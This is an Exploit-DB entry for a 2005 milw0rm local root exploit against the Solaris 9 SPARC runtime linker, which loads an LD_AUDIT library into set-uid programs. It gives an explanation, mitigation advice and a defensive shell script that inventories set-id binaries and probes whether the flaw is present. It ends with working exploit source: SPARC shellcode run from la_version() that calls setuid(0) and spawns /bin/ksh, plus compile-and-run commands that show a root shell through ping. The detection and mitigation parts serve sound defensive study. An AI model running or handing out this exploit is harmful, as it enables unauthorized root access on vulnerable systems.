Title: setuid() and execve()
Vendor: Solaris
By: milw0rm.com
CVSS: 7.2 (HIGH)
CWE: 264 (Permissions, Privileges, and Access Controls)
Product Name: Solaris
Affected Version From: Solaris 9 on SPARC
Affected Version To: Solaris 9 on SPARC
Patch Exists: NO
CPE: o:sun:solaris:9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: SPARC
Year: 2005

Solaris 9 on SPARC

On Solaris 9 for SPARC the runtime linker (ld.so.1) honors the LD_AUDIT environment variable even when it is starting a set-uid program. LD_AUDIT names a shared object that ld.so.1 loads into the new process and whose audit entry points, beginning with la_version(), it calls before the program's own main() runs. A local user can therefore build a shared library whose la_version() runs arbitrary code, export LD_AUDIT pointing at it, and execute any set-uid-root binary; the exploit below uses ping. Because the linker has already taken on the effective uid 0 that the set-uid bit confers, that code runs as root. The payload here is a short SPARC shellcode that calls setuid(0), so the real uid becomes root as well, and then execs /bin/ksh, leaving the user in a root shell. The vulnerability is the linker's willingness to load an untrusted LD_AUDIT library into a secure process; setuid() and execve() are only the system calls the payload issues once it is running.

Mitigation:

Removing the set-uid bit from ping (chmod u-s on /usr/sbin/ping) closes that one target, but because the flaw sits in the runtime linker every other set-uid or set-gid program on the system can be used the same way, and stripping the bit from all of them breaks legitimate use (ping needs raw sockets, passwd needs to write the shadow file). The real fix is a runtime linker that ignores LD_AUDIT for secure (set-uid/set-gid) processes, as ld.so.1 already ignores LD_LIBRARY_PATH and restricts LD_PRELOAD to trusted directories for them; this page records no vendor patch (Patch Exists: NO). Until one is applied, reduce the set of set-id binaries to the minimum actually needed and limit local logins to trusted users.
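The two checks a practitioner wants around this bug, as an added example that is not part of the milw0rm post: an inventory of the set-uid/set-gid programs a local user could point LD_AUDIT at (any of them is as good a target as ping), and a benign probe library that reports whether the runtime linker actually loads an LD_AUDIT object into such a process and with what privileges. The function names, the probe source and its LDAUDIT_PROBE marker are this example's own choices; it is POSIX sh and needs a C compiler only for build_probe.

```sh
#!/bin/sh
# Added example, not code from the original page. Inventories set-id files
# and probes whether LD_AUDIT is honored in a set-uid process.

# list_setid_files DIR: regular files under DIR with set-uid or set-gid set.
list_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# count_setid_files DIR: number of such files, printed without whitespace.
count_setid_files() {
    list_setid_files "$1" | wc -l | tr -d ' '
}

# strip_setid FILE: the page's mitigation applied to one binary. It closes
# that one door only; the vector is the linker, so every other set-id file
# stays usable.
strip_setid() {
    chmod u-s,g-s "$1"
}

# build_probe OUT.so: compile a benign audit library that only reports the
# uid/euid it was loaded with. rtld calls la_version() before main(); the
# library hands back the version it was offered so that it stays loaded.
build_probe() {
    src="${TMPDIR:-/tmp}/ldaudit_probe.$$.c"
    cat > "$src" <<'EOF'
#include <stdio.h>
#include <unistd.h>
unsigned int la_version(unsigned int version) {
    fprintf(stderr, "LDAUDIT_PROBE uid=%ld euid=%ld\n",
            (long)getuid(), (long)geteuid());
    return version;
}
EOF
    cc -fPIC -shared -o "$1" "$src" && rm -f "$src"
}

# classify_probe_output LINE CALLER_UID: VULNERABLE if the probe ran with
# euid 0 for a non-root caller (untrusted code inside a set-uid process),
# HONORED if it ran but only with the caller's own privileges, IGNORED if
# the linker never loaded it (what a fixed ld.so.1 shows for secure apps).
classify_probe_output() {
    case "$1" in
        *LDAUDIT_PROBE*) ;;
        *) echo IGNORED; return 0 ;;
    esac
    euid=$(printf '%s\n' "$1" | sed -n 's/.*euid=\([0-9][0-9]*\).*/\1/p')
    if [ "$euid" = 0 ] && [ "$2" != 0 ]; then
        echo VULNERABLE
    else
        echo HONORED
    fi
}

# probe_ld_audit PROBE.so TARGET: run TARGET (a set-uid binary such as the
# page's ping) with LD_AUDIT pointing at the probe and classify the result.
# TARGET's stdout is dropped; only the probe's stderr line is inspected.
probe_ld_audit() {
    line=$(LD_AUDIT="$1" "$2" 2>&1 >/dev/null </dev/null \
           | grep LDAUDIT_PROBE || true)
    classify_probe_output "$line" "$(id -u)"
}
```

As an unprivileged user on the Solaris 9 system the page describes, `build_probe /tmp/probe.so && probe_ld_audit /tmp/probe.so /usr/sbin/ping` prints VULNERABLE, which is exactly the condition the exploit below relies on; on a linker that drops LD_AUDIT for secure processes it prints IGNORED. `list_setid_files /usr` gives the full list of equivalent targets, and `strip_setid` on each one is the page's mitigation, with the breakage noted above.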
Source: Exploit-DB raw data

/* 
Solaris 9 on SPARC: 

$ cat dupa.c
*/

/* SPARC shellcode: setuid(0) followed by an exec of /bin/ksh, using the
 * Solaris system-call trap (ta 8 with the call number in %g1). It lives in
 * the library's writable data segment, which on this platform is also
 * executable; the stores at +0x10/+0x14 land a few bytes past the end of
 * the array, in adjacent .data, which is harmless here. */
char sh[] =
/* setuid(0): and %g0,-1,%o0 ; or %g0,23,%g1 (SYS_setuid) ; ta 8 */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve(): bn,a ; bn,a ; call .-4 puts the call's own address in %o7
 * (the second bn,a then annuls the call so it is not re-executed);
 * add %o7,0x20,%o0 -> "/bin/ksh" ; add %o0,0x10,%o1 -> argv ;
 * st %g0,[%o0+8] NUL-terminates the path ; st %o0,[%o0+0x10] argv[0] ;
 * st %g0,[%o0+0x14] argv[1]=NULL ; or %g0,11,%g1 (Solaris syscall 11 is
 * SYS_exec, which takes only path and argv, so %o2 is never set) ; ta 8 */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* ld.so.1 calls la_version() in the audit library before anything else in
 * the process runs, here with the effective uid 0 of the set-uid program. */
unsigned int la_version(unsigned int version) {
       void (*f)(void) = (void (*)(void))sh;
       (void)version;
       f();          /* returns only if the exec fails */
       return 3;     /* audit interface version the original returned */
}

/*
Build the audit library, point LD_AUDIT at it and run any set-uid-root
program (ping here, with no arguments, so the payload fires before ping
even prints its usage). The shell that appears has uid 0; the gid is
still the user's because the payload only calls setuid(0):

$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
*/

// milw0rm.com [2005-06-28]